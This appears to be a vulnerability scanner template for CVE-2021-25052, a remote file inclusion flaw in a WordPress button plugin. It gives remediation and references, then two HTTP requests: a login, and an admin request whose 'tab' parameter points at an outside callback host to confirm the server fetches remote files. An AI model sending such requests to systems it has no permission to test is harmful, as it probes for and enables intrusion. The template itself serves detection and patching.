id: CVE-2021-25052 info: name: WordPress Button Generator <2.3.3 - Remote File Inclusion author: cckuailong severity: high description: WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution. remediation: | Update to the latest version of the WordPress Button Generator plugin (2.3.3) to fix the remote file inclusion vulnerability. reference: - https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a - https://nvd.nist.gov/vuln/detail/CVE-2021-25052 - https://plugins.trac.wordpress.org/changeset/2641639/button-generation classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-25052 cwe-id: CWE-352 epss-score: 0.01852 epss-percentile: 0.87007 cpe: cpe:2.3:a:wow-company:button_generator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: wow-company product: button_generator framework: wordpress tags: wp-plugin,authenticated,wpscan,cve,cve2021,rfi,wp,wordpress http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word name: "http" part: interactsh_protocol words: - "http" - type: status status: - 200 # digest: 4b0a00483046022100ecd6bd1437342cce026881a568aa4ce6785d19612f91b0ab61043be8d1903da4022100e8441203ba4be994e36c73956583275b8dc9386ebc4b0a8db88be97bf7303bd4:922c64590222798bb761d5b6d8e72950